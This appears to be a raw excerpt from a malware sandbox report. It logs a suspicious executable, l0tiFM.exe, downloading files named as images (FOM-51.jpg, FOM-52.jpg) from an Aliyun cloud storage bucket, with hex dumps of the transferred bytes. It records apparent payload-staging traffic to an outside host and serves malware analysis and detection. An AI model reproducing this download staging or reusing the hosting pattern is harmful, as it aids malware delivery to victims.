                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                                                                              Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                                                                              Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                                                                              Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                                                                              Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                                                                              Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                                                                              Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                                                              2025-01-11 03:42:56 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                                                                              Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.849790118.178.60.94434064C:\Users\user\Documents\l0tiFM.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:58 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:58 UTC547INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:58 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 4859125
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8C26FB42B3634D9AF8F
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 9060732723227198118
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                                                              x-oss-server-time: 2
                                                                                                              2025-01-11 03:42:58 UTC3549INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 9c
                                                                                                              Data Ascii: ;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 f3
                                                                                                              Data Ascii: xd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c a4
                                                                                                              Data Ascii: ^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 d5
                                                                                                              Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 28
                                                                                                              Data Ascii: M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|(
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 ab
                                                                                                              Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca 6b
                                                                                                              Data Ascii: 07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/k
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 44
                                                                                                              Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*D
                                                                                                              2025-01-11 03:42:58 UTC4096INData Raw: d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a e8
                                                                                                              Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.849870118.178.60.94434064C:\Users\user\Documents\l0tiFM.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:43:10 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:11 UTC547INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:11 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 5062442
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8CFA0BE373830D01AF9
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "70C21DA900796B279A09040B00953E40"
                                                                                                              Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 360383310743409046
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                                                                              x-oss-server-time: 90
                                                                                                              2025-01-11 03:43:11 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
